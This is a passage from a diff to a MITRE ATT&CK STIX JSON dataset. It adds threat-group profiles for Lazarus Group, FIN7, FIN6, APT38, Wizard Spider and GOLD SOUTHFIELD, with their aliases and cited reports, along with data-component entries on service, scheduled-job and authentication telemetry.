By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)", + "aliases": [ + "GOLD SOUTHFIELD", + "Pinchy Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Thijn Bukkems, Amazon" + ], + "type": "intrusion-set", + "id": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "created": "2020-09-22T19:41:27.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0115", + "external_id": "G0115" + }, + { + "source_name": "Pinchy Spider", + "description": "(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "CrowdStrike Evolution of Pinchy Spider July 2021", + "description": "Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.", + "url": "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "description": "Secureworks. 
(n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Creation", + "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T19:01:41.451Z", + "name": "Lazarus Group", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. 
(Citation: Novetta Blockbuster)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). ", + "aliases": [ + "Lazarus Group", + "Labyrinth Chollima", + "HIDDEN COBRA", + "Guardians of Peace", + "ZINC", + "NICKEL ACADEMY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.2", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "created": "2017-05-31T21:32:03.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0032", + "external_id": "G0032" + }, + { + "source_name": "Labyrinth Chollima", + "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)" + }, + { + "source_name": "ZINC", + "description": "(Citation: Microsoft ZINC disruption Dec 2017)" + }, + { + "source_name": "Lazarus Group", + "description": "(Citation: Novetta Blockbuster)" + }, + { + "source_name": "NICKEL ACADEMY", + "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)" + }, + { + "source_name": "Guardians of Peace", + "description": "(Citation: US-CERT HIDDEN COBRA June 2017)" + }, + { + "source_name": "CrowdStrike Labyrinth Chollima Feb 2022", + "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. 
Retrieved February 1, 2022.", + "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Secureworks NICKEL ACADEMY Dec 2017", + "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.", + "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" + }, + { + "source_name": "Microsoft ZINC disruption Dec 2017", + "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.", + "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" + }, + { + "source_name": "HIDDEN COBRA", + "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. 
Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + }, + { + "source_name": "US-CERT HIDDEN COBRA June 2017", + "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A" + }, + { + "source_name": "US-CERT HOPLIGHT Apr 2019", + "description": "US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. 
[FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. 
Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. 
Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. 
This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). 
Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Modification", + "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:19:46.282Z", + "name": "User Account Authentication", + "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Metadata", + "description": 
"Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Modification", + "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + 
"source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." + }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. 
(2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." + } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": 
"2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T05:44:27.289Z", + "name": "Wizard Spider", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "aliases": [ + "Wizard Spider", + "UNC1878", + "TEMP.MixMaster", + "Grim Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Oleksiy Gayda" + ], + "type": "intrusion-set", + "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "created": "2020-05-12T18:15:29.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0102", + "external_id": "G0102" + }, + { + "source_name": "Grim Spider", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)" + }, + { + "source_name": "UNC1878", + "description": "(Citation: 
FireEye KEGTAP SINGLEMALT October 2020)" + }, + { + "source_name": "TEMP.MixMaster", + "description": "(Citation: FireEye Ryuk and Trickbot January 2019)" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "CrowdStrike Grim Spider May 2019", + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). 
WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-24T19:14:55.615Z", + "name": "Operational Databases", + "description": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0040", + "external_id": "DS0040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + 